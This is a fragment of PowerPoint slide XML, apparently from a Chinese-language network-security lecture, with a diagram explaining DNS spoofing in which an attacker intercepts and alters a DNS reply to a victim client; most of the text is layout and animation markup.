            <a:pathLst>
              <a:path w="3408218" h="498763">
                <a:moveTo>
                  <a:pt x="3408218" y="285008"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2849088" y="391885"/>
                  <a:pt x="2289958" y="498763"/>
                  <a:pt x="1721922" y="451262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1153886" y="403761"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0"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 name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="4787800"/>
            <a:ext cx="2663825" cy="144463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 3 h 455220"/>
              <a:gd name="T2" fmla="*/ 240057 w 3313215"/>
              <a:gd name="T3" fmla="*/ 2 h 455220"/>
              <a:gd name="T4" fmla="*/ 465109 w 3313215"/>
              <a:gd name="T5" fmla="*/ 15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 name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="4140100"/>
            <a:ext cx="2520950"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
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843213" y="5435500"/>
            <a:ext cx="3240087"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www.example.org=1.1.1.1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725" y="428297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4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="3851175"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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79">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p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>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p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="54" presetClass="entr" presetSubtype="0" accel="10000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strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffec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p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="50" presetID="54" presetClass="entr" presetSubtype="0" accel="10000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strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>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autoUpdateAnimBg="0" build="p"/>
      <p:bldP spid="5" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="9" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" bldLvl="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r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>客户端以特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>发起查询，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>服务器以同样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>应答</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击者拦截并修改应答，再返回给客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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3019251"/>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150" y="3306589"/>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956" y="5300919"/>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a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3926157" y="6189045"/>
            <a:ext cx="9893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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372225" y="4283869"/>
            <a:ext cx="1217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10" name="TextBox 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1414463" y="4027314"/>
            <a:ext cx="1211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受害客户端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11" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20502113" flipV="1">
            <a:off x="4442339" y="4423926"/>
            <a:ext cx="2260704" cy="501007"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 20042629 w 3408218"/>
              <a:gd name="T1" fmla="*/ 5007107 h 498763"/>
              <a:gd name="T2" fmla="*/ 10126060 w 3408218"/>
              <a:gd name="T3" fmla="*/ 7927892 h 498763"/>
              <a:gd name="T4" fmla="*/ 0 w 3408218"/>
              <a:gd name="T5" fmla="*/ 0 h 498763"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3408218"/>
              <a:gd name="T10" fmla="*/ 0 h 498763"/>
              <a:gd name="T11" fmla="*/ 3408218 w 3408218"/>
              <a:gd name="T12" fmla="*/ 498763 h 498763"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3408218" h="498763">
                <a:moveTo>
                  <a:pt x="3408218" y="285008"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2849088" y="391885"/>
                  <a:pt x="2289958" y="498763"/>
                  <a:pt x="1721922" y="451262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1153886" y="403761"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0"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Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="3162126"/>
            <a:ext cx="4125913" cy="593725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 821397 h 455220"/>
              <a:gd name="T2" fmla="*/ 12315215 w 3313215"/>
              <a:gd name="T3" fmla="*/ 691697 h 455220"/>
              <a:gd name="T4" fmla="*/ 23860727 w 3313215"/>
              <a:gd name="T5" fmla="*/ 4971618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 name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="15371821">
            <a:off x="2321020" y="3987688"/>
            <a:ext cx="1744667" cy="1224268"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2541319"/>
              <a:gd name="T1" fmla="*/ 5169805 h 1294410"/>
              <a:gd name="T2" fmla="*/ 3393938 w 2541319"/>
              <a:gd name="T3" fmla="*/ 2324044 h 1294410"/>
              <a:gd name="T4" fmla="*/ 8348303 w 2541319"/>
              <a:gd name="T5" fmla="*/ 0 h 1294410"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2541319"/>
              <a:gd name="T10" fmla="*/ 0 h 1294410"/>
              <a:gd name="T11" fmla="*/ 2541319 w 2541319"/>
              <a:gd name="T12" fmla="*/ 1294410 h 1294410"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2541319" h="1294410">
                <a:moveTo>
                  <a:pt x="0" y="1294410"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="304800" y="1046018"/>
                  <a:pt x="609600" y="797626"/>
                  <a:pt x="1033153" y="581891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1456706" y="366156"/>
                  <a:pt x="1999012" y="183078"/>
                  <a:pt x="2541319"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 name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3333746" y="3152982"/>
            <a:ext cx="2520950"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
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4667885" y="4562567"/>
            <a:ext cx="3240087" cy="58578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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.example.org=1.1.1.1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
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="513363" y="4417334"/>
            <a:ext cx="3455988" cy="584775"/>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③ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.example.org=1.1.1.5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="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smtClean="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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="460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4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4608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p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="53" presetClass="entr" presetSubtype="1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p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>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p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="47"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p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetID="54" presetClass="entr" presetSubtype="0" accel="10000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strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffec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p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="70" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="71" presetID="54" presetClass="entr" presetSubtype="0" accel="10000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strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="78" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="79" presetID="54" presetClass="entr" presetSubtype="0" accel="100000"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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
